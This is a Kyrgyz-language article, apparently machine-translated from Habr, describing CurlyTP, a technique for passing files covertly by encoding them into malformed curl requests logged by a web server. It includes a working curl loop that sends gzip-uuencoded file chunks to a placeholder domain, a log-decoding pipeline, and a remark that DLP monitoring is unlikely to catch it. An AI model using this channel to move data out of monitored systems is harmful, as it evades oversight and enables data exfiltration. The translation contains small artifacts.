Wikipedia аныктамасына ылайык, өлгөн тамчы жашыруун жайгашкан пайдалануу менен адамдардын ортосунда маалымат же кээ бир нерселерди алмашуу үчүн кызмат кылган кутум куралы болуп саналат. Идея адамдар эч качан жолукпайт - бирок алар дагы эле операциялык коопсуздукту сактоо үчүн маалымат алмашат.

Жашынган жер көңүл бурбашы керек. Ошондуктан, оффлайн дүйнөдө алар көбүнчө акылдуу нерселерди колдонушат: дубалдагы борпоң кыш, китепкана китеби же дарактагы көңдөй.

Интернетте көптөгөн шифрлөө жана анонимдөө куралдары бар, бирок бул куралдарды колдонуу фактысынын өзү көңүл бурат. Мындан тышкары, алар корпоративдик же мамлекеттик деңгээлде бөгөттөлүшү мүмкүн. Эмне кылуу керек?

Иштеп чыгуучу Райан Гүлс кызыктуу вариантты сунуштады - жашынуучу жай катары каалаган веб-серверди колдонуңуз. Эгер сиз ойлонуп көрсөңүз, веб-сервер эмне кылат? Сурамдарды кабыл алат, файлдарды чыгарат жана журналдарды жазат. Ал бардык суроо-талаптарды каттайт, ал тургай, туура эмес!

Көрсө, каалаган веб-сервер журналда дээрлик бардык билдирүүлөрдү сактоого мүмкүндүк берет. Гүлдөр муну кантип колдонууну ойлонушту.

Ал бул параметрди сунуш кылат:

1. Текст файлын (жашыруун билдирүү) алып, хэшти (md5sum) эсептеңиз.
2. Биз аны коддойбуз (gzip+uuencode).
3. Биз серверге атайылап туура эмес өтүнүчтү колдонуу менен журналга жазабыз.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Файлды окуу үчүн сиз бул операцияларды тескери тартипте аткарууңуз керек: файлды декоддоңуз жана ачыңыз, хэшти текшериңиз (хэшти ачык каналдар аркылуу коопсуз өткөрүп берүүгө болот).

Бош орундар менен алмаштырылат =+=даректе боштуктар калбашы үчүн. Автор CurlyTP деп атаган программа электрондук почта тиркемелери сыяктуу base64 коддоосун колдонот. Сурам ачкыч сөз менен жүргүзүлөт ?transfer?алуучу аны журналдардан оңой таба алышы үчүн.

Бул учурда журналдардан эмнени көрөбүз?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Жогоруда айтылгандай, жашыруун кабарды алуу үчүн операцияларды тескери тартипте аткаруу керек:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Процессти автоматташтыруу оңой. Md5sum дал келет жана файлдын мазмуну баары туура чечмеленгендигин тастыктайт.

ыкмасы абдан жөнөкөй. «Бул көнүгүүнүн максаты файлдарды күнөөсүз кичинекей веб-суроолор аркылуу өткөрүп берүүгө болорун далилдөө жана ал жөнөкөй текст журналдары менен каалаган веб-серверде иштейт. Негизи, ар бир веб-сервер жашынуучу жай!” деп жазат Flowers.

Албетте, ыкма алуучу сервердин журналдарына кирүү мүмкүнчүлүгүнө ээ болгондо гана иштейт. Бирок мындай мүмкүнчүлүк, мисалы, көптөгөн хостерлер тарабынан берилет.

Аны кантип колдонсо болот?

Райан Гүлс ал маалымат коопсуздугу боюнча адис эмес жана CurlyTP үчүн мүмкүн болгон колдонуу тизмесин түзбөйт дейт. Ал үчүн бул жөн гана түшүнүктүн далили, биз күн сайын көрүп жүргөн көнүмүш куралдарды салттуу эмес түрдө колдонууга болот.

Чынында, бул ыкма башка серверге караганда бир катар артыкчылыктарга ээ "жашырышат" Digital Dead Drop же PirateBox: ал сервер тарабында атайын конфигурацияны же кандайдыр бир атайын протоколдорду талап кылбайт - жана трафикти көзөмөлдөгөндөрдүн арасында шек жаратпайт. SORM же DLP тутумунун URL даректерин кысылган текст файлдары үчүн скандоосу күмөн.

Бул кызмат файлдары аркылуу билдирүүлөрдү берүү жолдорунун бири болуп саналат. Кээ бир өнүккөн компаниялар кантип жайгаштырганын эстей аласыз HTTP башындагы иштеп чыгуучу жумуштары же HTML барактарынын кодунда.

Бул Пасха жумурткасын веб-иштеп чыгуучулар гана көрөт деген ой болгон, анткени кадимки адам баш жазууларды же HTML кодду карабайт.

Source: www.habr.com